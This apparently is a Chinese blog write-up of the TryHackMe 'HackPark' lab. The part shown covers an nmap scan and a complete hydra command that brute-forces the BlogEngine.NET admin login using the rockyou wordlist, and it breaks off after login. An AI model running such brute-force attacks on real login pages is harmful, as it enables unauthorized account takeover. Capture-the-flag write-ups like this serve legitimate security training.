Tryhackme - hackpark (考点:hydra & BlogEngine.NET 3.3.6 & autologon登录信息提权 & abnormal service提权)

1 扫描

主要就是80进web搜集信息

C:\root> nmap -A 10.10.16.216
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.64 seconds
C:\root> nmap -A 10.10.16.216 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Nmap scan report for 10.10.16.216
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  tcpwrapped
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  tcpwrapped
|_ssl-date: 2020-05-26T05:56:29+00:00; +1s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops

2 hydra

没找到什么价值东西
dirbuster扫到登录框
在这里插入图片描述
没有账号信息提示文件,sql注入也难搞。hydra跑跑看看,然后边等结果,边继续搜集其他信息。

keep me logged in那里打勾,然后随便输
burp抓包,再根据burp的抓包数据从而写这个hydra命令。账号就先猜admin
建议参考我的这个命令。
我先前试了很多次都跑不出来,跑出来16个莫名其妙的,我在论坛里看也有很多人是这种情况。
最后这个才ok

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.16.216 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=d%2B8KY5CoALVVu3cyx1zQBa5HJIO%2B%2BuZdB%2F%2BI60ddHdGPMLjeczLW8wG6%2F3cxgyyj17FxjLlJy7Twjwl9N1TRQeynyuc%2F5RKomk5MP%2FpeLy5wQ2c%2B7weG4x4uHWQiN%2FQF4LIxVWckJ9JJ917ffDnhcNkWhEBiW8q3eZ19lK2WyzCRq7S2DZkFFNMnsXpVs7at1VNHuoutNFwFg%2BVI37N6HIkOx5Qt328mR7vR7ebWV06at%2FS%2BsdWUqSKUoYuhr9OqGbzaUlh%2FnjLqzUm7SFRA1L5C8PIZwaoyXGbiL7eASUHrj8s6vV%2FeiHbGYe5qsDWUSyQ%2BC2n0ElFVOIz403nfU7lhvpxR3XtPJgq5UHAn%2ByWx57H7&__EVENTVALIDATION=1XEVJ1TGaBbiR0C2cHb0tUPm%2F1h0aH5m0aXu8WckU4cPKPYBmRLiAqA2YXBqXGokg%2FhfrQi0VwT0Hq88Tkye8%2B5IB%2FtOYN5QvJ%2Fcr5XMLS4etWgbMuTiY%2FFYogM1B6Rn9WbdAh%2FRXUPQEDcxHvLHDKyyIS09lavR7XBTiUvPVfzqMMDv&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

在这里插入图片描述
进入后,看到版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值